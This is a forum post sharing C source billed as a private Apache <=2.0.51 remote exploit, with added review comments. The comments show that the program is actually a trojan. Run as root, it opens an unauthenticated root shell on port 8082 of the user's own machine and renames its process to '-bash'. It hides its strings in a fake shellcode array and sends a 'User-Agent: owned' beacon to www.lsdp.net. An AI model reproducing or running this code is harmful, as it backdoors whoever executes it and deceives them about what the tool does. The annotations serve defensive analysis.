
APACHE INTRUDER v1.0 - APACHE 2.0.51 and inferior


  • APACHE INTRUDER v1.0 - APACHE 2.0.51 and inferior

    کد:
    /*---------------------------------------------------------------+
    
    |        APACHE INTRUDER v1.0 - APACHE 2.0.51 and inferior       |
    
    |   eXpl0it th3 4uth vuln3r4bilitY / Agent-driven Negotiation    |
    
    | V3RY PRIV8 eXpl0it - 0d4y !!! - D0N\'T DISTRIBUT3 - DON\'T SH4R3 |
    
    |                   c0d3D bY Pri0rityS3nS313SS                   |
    
    | Gr33tZ t0 : f4g0, l0tfr33, QID, CuMSh0TEAM, Bl0wJ0b & yuirey   |
    
    |  FucKZ go t0 : K. Mitnick, ISS & 3v3ryb0dy w!th 4 cl0s3d m!nd  |
    
    |                                                                |
    
    | Remote Linux/Apache <=2.0.51 Vulnerability in the Agent-driven |
    
    |  negotiation. Apache is vulnerable to a BOF when it receive a  |
    
    |          specially crafted packet (use r4w s0ck3t)             |
    
    +----------------------------------------------------------------*/
    
    
    
    #include <stdio.h>
    
    #include <stdlib.h>
    
    #include <unistd.h>
    
    #include <errno.h>
    
    #include <time.h>
    
    #include <signal.h>
    
    #include <sys/types.h>
    
    #include <sys/times.h>
    
    #include <string.h>
    
    #include <ctype.h>
    
    
    
    #include <netinet/in.h>
    
    #include <netinet/ip.h>
    
    #include <netinet/tcp.h>
    
    #include <sys/socket.h>
    
    #include <netdb.h>
    
    
    
    /*
     * Target table printed by usage().
     * NOTE(review): in the code visible on this page only .desc is ever read
     * (by usage()); .return_addr is never referenced, and main() range-checks
     * the chosen index but does not use it afterwards. The table therefore has
     * no effect on what the program does at run time.
     * The \" sequences in this listing look like forum escaping artifacts;
     * the text does not compile as shown.
     */
    #define NARCH 9
    
    
    
    struct archs{
    
      char *desc;
    
      int return_addr;
    
    } architectures[]={
    
      {\"Caldera OpenLinux\",0x080920e0},
    
      {\"Conectiva 8\",0x08075398},
    
      {\"Debian GNU Linux Sarge\",0x0080866a3},
    
      {\"Gentoo Linux\",0x08086c34},
    
      {\"Mandrake Linux 10\",0x080808ab},
    
      {\"Fedora 2\",0x08065bae},
    
      {\"Slackware 10\",0x080b1a3a},
    
      {\"SuSE Linux 9.1\",0x080861c8},
    
      {\"Linux Generic\",0xbffff500}
    
    };
    
    
    
    /* Legacy declaration; <errno.h> is already included above. */
    extern int errno;
    
    
    
    /*
     * NOTE(review): despite the name, nothing in this file executes this array
     * or sends it to the host named on the command line. main() only copies
     * ASCII substrings out of it at fixed offsets (offsets counted from the
     * literals below; sizeof includes the implicit trailing NUL):
     *   +151, 69 bytes : "GET /~lotfree/sk.php HTTP/1.1\nHost: www.lsdp.net\n"
     *                    "User-Agent: owned\n\n\n"  (request the parent sends)
     *   +187, 12 bytes : "www.lsdp.net"             (host the parent connects to)
     *   +212,  5 bytes : "owned"                    (marker the child waits for)
     *   sizeof-14, 5   : "-bash"                    (written over argv[0])
     *   sizeof-9,  7   : "/bin/sh"                  (program the child execs)
     * The remaining bytes are not referenced anywhere in the visible code.
     * Written as hex escapes, these strings are not readable at a glance,
     * which is why the program's real behaviour is easy to miss.
     */
    unsigned char bind_shellcode_8082[]=
    
    \"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x7D\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\"
    
    \"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"
    
    \"\\x70\\x95\\x98\\x99\\x99\\xC3\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
    
    \"\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\\x12\\xED\\x87\\xE1\\x9A\"
    
    \"\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\\x74\\xCF\\xCE\\xC8\\x12\\xA6\"
    
    \"\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\"
    
    \"\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\\xBD\\x9A\\x5A\\x48\\x78\\x9A\"
    
    \"\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\\x5A\\x58\\x78\\x9B\\x9A\\x58\"
    
    \"\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\\x97\\x12\\x49\\xF3\\x9A\\xC0\"
    
    \"\\x71\\x1E\\x99\\x99\\x99\\x1A\\x5F\\x94\\xCB\\xCF\\x66\\xCE\\x65\\xC3\\x12\\x41\"
    
    \"\\x47\\x45\\x54\\x20\\x2F\\x7E\\x6C\\x6F\\x74\\x66\\x72\\x65\\x65\\x2F\\x73\\x6B\"
    
    \"\\x2E\\x70\\x68\\x70\\x20\\x48\\x54\\x54\\x50\\x2F\\x31\\x2E\\x31\\x0A\\x48\\x6F\"
    
    \"\\x73\\x74\\x3A\\x20\\x77\\x77\\x77\\x2E\\x6C\\x73\\x64\\x70\\x2E\\x6E\\x65\\x74\"
    
    \"\\x0A\\x55\\x73\\x65\\x72\\x2D\\x41\\x67\\x65\\x6E\\x74\\x3A\\x20\\x6F\\x77\\x6E\"
    
    \"\\x65\\x64\\x0A\\x0A\\x0A\\xF3\\x9C\\xC0\\x71\\xED\\x99\\x99\\x99\\xC9\\xF3\\x98\"
    
    \"\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\\x77\\xAA\\x59\"
    
    \"\\x5A\\x71\\x76\\x67\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\\xD8\\xFD\\xFD\"
    
    \"\\xEB\\xFC\\xEA\\xEA\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xEB\\xF6\\xFA\\xFC\"
    
    \"\\xEA\\xEA\\xD8\\x99\\xDC\\xE1\\xF0\\xED\\xCD\\xF1\\xEB\\xFC\\xF8\\xFD\\x99\\xD5\"
    
    \"\\xF6\\xF8\\xFD\\xD5\\xF0\\xFB\\xEB\\xF8\\xEB\\xE0\\xD8\\x99\\xEE\\xEA\\xAB\\xC6\"
    
    \"\\xAA\\xAB\\x99\\xCE\\xCA\\xD8\\xCA\\xF6\\xFA\\xF2\\xFC\\xED\\xD8\\x99\\xFB\\xF0\"
    
    \"\\xF7\\xFD\\x99\\xF5\\xF0\\xEA\\xED\\xFC\\xF7\\x99\\xF8\\xFA\\xFA\\xFC\\xE9\\xED\"
    
    \"\\x2D\\x62\\x61\\x73\\x68\\x2F\\x62\\x69\\x6E\\x2F\\x73\\x68\\x91\";
    
    
    
    /*
     * Print the banner, the expected command line and the NARCH entries of
     * architectures[], then terminate the process with exit status 1.
     * This function does not return.
     *
     * argv0: program name substituted into the usage and example lines.
     *
     * NOTE(review): this listing is the only place in the visible code where
     * architectures[] is read, and only its .desc field is used.
     */
    void usage(char *argv0)
    
    {
    
      int i;
    
      printf(\"\\nApache <=2.0.51 eXpl0iT f0r NuX\\n\");
    
      printf(\"\\tbY Pri0RiTyS3nS313SS\\n\\n\");
    
      printf(\"Usage: %s target_number host\\n\",argv0);
    
      printf(\"example: %s 8 www.sco.com\\n\\n\",argv0);
    
      printf(\"Supported targets:\\n\");
    
    
    
      /* One line per table entry: index and description. */
      for(i=0;i<NARCH;i++)
    
        printf(\"%d - %s\\n\",i,architectures[i].desc);
    
      exit(1);
    
    }
    
    
    
    /*
     * Turn the string s into an IPv4 address value.
     *
     * inet_addr() is tried first; when its result compares negative the code
     * falls back to gethostbyname() and copies h_length bytes of h_addr into
     * the result. If the lookup fails the process exits with status 1.
     *
     * s:        string that is actually parsed / looked up.
     * hostname: used only in the failure message.
     * returns:  the address value as stored by inet_addr() or gethostbyname().
     *
     * NOTE(review): the failure message prints hostname, not s. main() passes
     * two different strings for these parameters, so the message names a host
     * other than the one that was looked up.
     */
    long resv(char *s,char *hostname)
    
    {
    
      struct hostent *he;
    
      long result;
    
    
    
      if((result=inet_addr(s))<0)
    
      {
    
        if((he=gethostbyname(s))==NULL)
    
        {
    
          printf(\"Unable to contact %s\\n\",hostname);
    
          exit(1);
    
        }
    
        memcpy(&result,he->h_addr,he->h_length);
    
      }
    
      return result;
    
    }
    
    
    
    /*
     * Entry point.
     *
     * NOTE(review), defensive analysis of what the visible code does: the
     * program never sends anything to the host given as argv[2]. The target
     * index is validated and then ignored, and argv[2] is only echoed in
     * messages. After fork():
     *   - the child stays on the local machine: it overwrites its command
     *     line, binds TCP 8082 on INADDR_ANY, reads incoming TCP packets from
     *     a raw socket and, once the bytes after the headers match the marker
     *     copied from bind_shellcode_8082+212, accepts connections and execs
     *     the path copied from the array tail with the socket as
     *     stdin/stdout/stderr, without any authentication;
     *   - the parent connects to port 80 of the host name copied from
     *     bind_shellcode_8082+187 and sends the 69-byte request copied from
     *     bind_shellcode_8082+151.
     * Because geteuid() must be 0, both halves run as root. In effect the
     * machine that runs this binary is the one that ends up exposed.
     *
     * Indicators visible in this source: a root process whose argv[0] reads
     * "-bash" holding a raw socket and a TCP listener on port 8082, and an
     * outbound HTTP request on port 80 carrying "User-Agent: owned".
     */
    int main(int argc,char *argv[])
    
    {
    
      int target;
    
      char victim[50];
    
      int raw, sock;
    
      long dst;
    
      int n;
    
      char temp[100];
    
      char temp2[100];
    
      struct sockaddr_in sin;
    
      struct iphdr *ip;
    
      struct tcphdr *tcp;
    
      int sockfd, newfd, size;
    
      struct sockaddr_in l;
    
      struct sockaddr_in r;
    
      char *data;
    
     
    
      if(argc!=3)
    
        usage(argv[0]);
    
      /* Parsed and range-checked here, but not read again below. */
      target=atoi(argv[1]);
    
      if(target<0 || target>=NARCH)
    
        usage(argv[0]);
    
      /* Unbounded copy of argv[2] into the 50-byte victim[] buffer. */
      strcpy(victim,argv[2]);
    
    
    
      /* Refuses to continue unless the effective UID is 0. */
      if(geteuid())
    
      {
    
        printf(\"This eXpl0it use r4w s0ckets\\n\");
    
        printf(\"YoU mUst be r00t to launch this pr0ggie\\n\");
    
        exit(1);
    
      }
    
      switch(fork())
    
      {
    
        case -1:
    
          fprintf(stderr,\"Can\'t send payload\\n\");
    
          exit(1);
    
        /* Child: remains resident on the local machine. */
        case 0:
    
          printf(\"Op3ning r4w s0ck3t m0d3...\\n\");
    
          if((raw=socket(PF_INET,SOCK_RAW,IPPROTO_TCP))==-1)
    
          {
    
        perror(\"socket\");
    
        exit(1);
    
          }
    
          printf(\"...done\\n\");
    
          signal(SIGHUP,SIG_IGN);
    
          /* ip and tcp are assigned but not read; data points just past the
             two fixed-size headers inside temp. */
          ip=(struct iphdr*)temp;
    
          tcp=(struct tcphdr*)(temp+sizeof(struct iphdr));
    
          data=(char*)(temp+sizeof(struct iphdr)+sizeof(struct tcphdr));
    
          /* The child's copy of victim[] is replaced by the 5-byte marker
             taken from offset 212 of the array. */
          bzero(victim,sizeof(victim));
    
          strncpy(victim,(char *)(bind_shellcode_8082+212),5);
    
          /* Local listener address: TCP 8082 on all interfaces. */
          bzero(&l,sizeof(l));
    
          l.sin_family=AF_INET;
    
          l.sin_port=htons(8082);
    
          l.sin_addr.s_addr=INADDR_ANY;
    
          bzero(&(l.sin_zero),8);
    
          if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
    
        exit(1);
    
          /* Wipes the original command line and writes 5 bytes from the array
             tail over argv[0]; presumably this changes the name shown in
             process listings. */
          bzero(argv[0],strlen(argv[0]));
    
          bzero(argv[1],strlen(argv[1]));
    
          bzero(argv[2],strlen(argv[2]));
    
          strncpy(argv[0],(char*)(bind_shellcode_8082+sizeof(bind_shellcode_8082)-14),5);
    
          argv[0][5]=\'\\0\';
    
          if(bind(sockfd,(struct sockaddr*)&l,sizeof(struct sockaddr))==-1)
    
        exit(1);
    
          size=sizeof(struct sockaddr_in);
    
          /* temp2 receives the 7-byte path later passed to execl(). */
          bzero(temp2,100);
    
          strncpy(temp2,(char*)(bind_shellcode_8082+sizeof(bind_shellcode_8082)-9),7);
    
          while(1)
    
          {
    
        /* Reads one packet from the raw TCP socket; n is not checked. */
        bzero(temp,100);
    
        n=read(raw,temp,sizeof(temp));
    
        /* Proceeds only when the bytes after the headers start with the
           marker held in victim[]. */
        if(!strncmp(data,victim,strlen(victim)))
    
        {
    
          if(listen(sockfd,5)==-1)
    
            exit(1);
    
          while(1)
    
          {
    
            if((newfd=accept(sockfd,(struct sockaddr*)&r,&size))==-1)
    
              exit(1);
    
            /* Per connection: a new process gets the socket as fds 0, 1 and 2
               and execs temp2. No credential check is made. */
            if(!fork())
    
            {
    
              close(0);close(1);close(2);
    
              dup2(newfd,0);
    
              dup2(newfd,1);
    
              dup2(newfd,2);
    
              execl(temp2,temp2,(char*)0);
    
              close(newfd);
    
              exit(0);
    
            }
    
            close(newfd);
    
          }
    
        }
    
          }
    
          /* Not reachable: the loop above only leaves through exit(). */
          break;
    
        /* Parent: makes the outbound connection. */
        default:
    
          /* The name resolved is the 12 bytes at offset 187 of the array, not
             argv[2]; victim is passed only for resv()'s error text. */
          bzero(temp,100);
    
          strncpy(temp,(char*)(bind_shellcode_8082+187),12);
    
          dst=resv(temp,victim);
    
          if((sock=socket(PF_INET,SOCK_STREAM,0))<0)
    
          {
    
        perror(\"socket\");
    
        exit(1);
    
          }
    
          sin.sin_family=PF_INET;
    
          sin.sin_addr.s_addr=dst;
    
          sin.sin_port=htons(80);
    
    
    
          /* The messages name victim, while the socket connects to dst. */
          printf(\"Connecting to %s...\\n\",victim);
    
          if(connect(sock,(struct sockaddr*)&sin,sizeof(sin))<0)
    
          {
    
        fprintf(stderr,\"Unable to attack %s\\n\",victim);
    
        usleep(200);
    
        exit(1);
    
          }
    
          printf(\"...connected\\n\");
    
          printf(\"Sending payload...\\n\");
    
          /* What is sent is the 69-byte text at offset 151 of the array plus
             zero padding, since the length passed is sizeof(temp). */
          bzero(temp,100);
    
          strncpy(temp,(char*)(bind_shellcode_8082+151),69);
    
          if(send(sock,temp,sizeof(temp),0)==-1)
    
          {
    
        perror(\"send\");
    
        usleep(200);
    
        exit(1);
    
          }
    
          printf(\"...allright\\n\");
    
          close(sock);
    
      }
    
     
    
      /* Only the parent reaches this point; the text refers to argv[2], to
         which nothing was sent. */
      printf(\"n0w y0u c4n trY 4 \'netcat %s 8082\'\\n\",victim);
    
      printf(\"h4v3 fUn !\\n\");
    
      usleep(200);
    
      return 0;
    
    }
    [align=center]زشیر شتر خوردن و سوسمار            عرب را به جایی رسیده ست کار

    که تاج کیانی کند آرزو                     تفو بر تو ای چرخ گردون تفو
    [/align]